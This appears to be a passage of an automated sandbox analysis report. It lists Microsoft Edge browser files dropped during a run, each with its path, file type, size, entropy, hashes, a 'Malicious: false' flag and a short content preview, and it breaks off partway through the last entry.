Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3c5e1.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089776935272958
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWqdi1zNtPMykzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn2NkzItSmd6qE7lFoC
MD5:	0E4A4F51C52FD539CB2206BBDA3778D8
SHA1:	2D136B3C2A9371B102D0EDE94B090276A1795593
SHA-256:	F8FE6F059DB72E1E39051B57E8891B96B5B7CF1F031F37F2005E6AB915192CB4
SHA-512:	533FCC2751EBB96A7D4D8892D5DFD46D5AD2E8C5F82DC90D20FC66FE0C322B38B8A6A697ECC978DC1D003D7512BBEF6E0BC8F25407739C15F97A6BA8E086A43B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF41a2b.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089776935272958
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWqdi1zNtPMykzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn2NkzItSmd6qE7lFoC
MD5:	0E4A4F51C52FD539CB2206BBDA3778D8
SHA1:	2D136B3C2A9371B102D0EDE94B090276A1795593
SHA-256:	F8FE6F059DB72E1E39051B57E8891B96B5B7CF1F031F37F2005E6AB915192CB4
SHA-512:	533FCC2751EBB96A7D4D8892D5DFD46D5AD2E8C5F82DC90D20FC66FE0C322B38B8A6A697ECC978DC1D003D7512BBEF6E0BC8F25407739C15F97A6BA8E086A43B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4afb5.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089776935272958
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWqdi1zNtPMykzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn2NkzItSmd6qE7lFoC
MD5:	0E4A4F51C52FD539CB2206BBDA3778D8
SHA1:	2D136B3C2A9371B102D0EDE94B090276A1795593
SHA-256:	F8FE6F059DB72E1E39051B57E8891B96B5B7CF1F031F37F2005E6AB915192CB4
SHA-512:	533FCC2751EBB96A7D4D8892D5DFD46D5AD2E8C5F82DC90D20FC66FE0C322B38B8A6A697ECC978DC1D003D7512BBEF6E0BC8F25407739C15F97A6BA8E086A43B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF50f0b.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44455
Entropy (8bit):	6.089776935272958
Encrypted:	false
SSDEEP:	768:+DXzgWPsj/qlGJqIY8GB4kWqdi1zNtPMykzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7yn2NkzItSmd6qE7lFoC
MD5:	0E4A4F51C52FD539CB2206BBDA3778D8
SHA1:	2D136B3C2A9371B102D0EDE94B090276A1795593
SHA-256:	F8FE6F059DB72E1E39051B57E8891B96B5B7CF1F031F37F2005E6AB915192CB4
SHA-512:	533FCC2751EBB96A7D4D8892D5DFD46D5AD2E8C5F82DC90D20FC66FE0C322B38B8A6A697ECC978DC1D003D7512BBEF6E0BC8F25407739C15F97A6BA8E086A43B
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6773696719930975
Encrypted:	false
SSDEEP:	12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
MD5:	6FFCCB198DC6B17E165460E6E246B03C
SHA1:	014A46B0E6E84089E1C20FA232F54CA737D5F023
SHA-256:	D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
SHA-512:	846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.3439888556902035
Encrypted:	false
SSDEEP:	3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
MD5:	177F4D75F4FEE84EF08C507C3476C0D2
SHA1:	08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
SHA-256:	21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
SHA-512:	94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
Malicious:	false
Preview:	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	130439
Entropy (8bit):	3.80180718117079
Encrypted:	false
SSDEEP:	1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
MD5:	EB75CEFFE37E6DF9C171EE8380439EDA
SHA1:	F00119BA869133D64E4F7F0181161BD47968FA23
SHA-256:	48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
SHA-512:	044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
Malicious:	false
Preview:	{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.346439344671015
Encrypted:	false
SSDEEP:	3:kfKbUPVXXMVQX:kygV5
MD5:	6A3A60A3F78299444AACAA89710A64B6
SHA1:	2A052BF5CF54F980475085EEF459D94C3CE5EF55
SHA-256:	61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
SHA-512:	C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
Malicious:	false
Preview:	synchronousLookupUris_638343870221005468

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.556488479039065
Encrypted:	false
SSDEEP:	3:GSCIPPlzYxi21goD:bCWBYx99D
MD5:	3A05EAEA94307F8C57BAC69C3DF64E59
SHA1:	9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
SHA-256:	A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
SHA-512:	6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
Malicious:	false
Preview:	9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.030394788231021
Encrypted:	false
SSDEEP:	3:0xXeZUSXkcVn:0Re5kcV
MD5:	52E2839549E67CE774547C9F07740500
SHA1:	B172E16D7756483DF0CA0A8D4F7640DD5D557201
SHA-256:	F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
SHA-512:	D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
Malicious:	false
Preview:	topTraffic_638004170464094982

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	raw G3 (Group 3) FAX, byte-padded
Category:	dropped
Size (bytes):	460992
Entropy (8bit):	7.999625908035124
Encrypted:	true
SSDEEP:	12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
MD5:	E9C502DB957CDB977E7F5745B34C32E6
SHA1:	DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
SHA-256:	5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
SHA-512:	B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
Malicious:	false
Preview:	...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<.....Z..%...._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t\|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^..T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d\|.../....._...f.....d....Im..g.b..R.q.<xx...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....\|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	9
Entropy (8bit):	3.169925001442312
Encrypted:	false
SSDEEP:	3:CMzOn:CM6
MD5:	B6F7A6B03164D4BF8E3531A5CF721D30
SHA1:	A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
SHA-256:	3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
SHA-512:	4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
Malicious:	false
Preview:	uriCache_

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	179
Entropy (8bit):	5.015279837524851
Encrypted:	false
SSDEEP:	3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclXy90:YWLSGTt1o9LuLgfGBPAzkVj/T8liq
MD5:	D98D99EBDB1D48231D012185087C9C4B
SHA1:	D0333458F501273EA0841098A7B0D02C9C85B14B
SHA-256:	0EF81DB37657A91DC428AABBF6477BCFD84A6E38F01D233C042202DCAA73BC0F
SHA-512:	562A11A3E3094DD343182C62F914C1F094C8D387DF792147F41926F0FE954ABE0291AD5F03834B8FC7C66FAAECEB57B29E50EAED4CFF272E1F425E6766B9A962
Malicious:	false
Preview:	{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1732677935827328}]}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
MD5:	F732DBED9289177D15E236D0F8F2DDD3
SHA1:	53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
SHA-256:	2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
SHA-512:	B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\b2dcb2e2-b125-4f30-a9f0-ab5f23e80a60.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	46507
Entropy (8bit):	6.086921500693603
Encrypted:	false
SSDEEP:	768:MMkbJrT8IeQc5WKPzAi1zNtea29rVSMC421IQmxgpCio9JDSgzMMd6qD47u30H:MMk1rT8H+K22IQ9Fo9tSmd6qE7p
MD5:	C2EDBEA136304E074076B8A0F947A511
SHA1:	AB788AEA4AA11F19725873311F4BC066AF388EEA
SHA-256:	932550BD361F4FE30DCF56D68E727F02432BE44DC22A91894DAA524CF570D594
SHA-512:	EB96B2A07CC36C3494CC5CED43E0A171EEE47E828DDD52AD3F736A84D25C748CCB007F115FF786F37977C3AF84372383046B85C6D491A488AD36F9E44C194E6C
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13377050731294325","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"95ccd42f-fd6f-4ef8-b475-5ec31f788b59"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1732577135"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\bebf7213-2bd8-4c17-ad5b-0b6506f86834.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
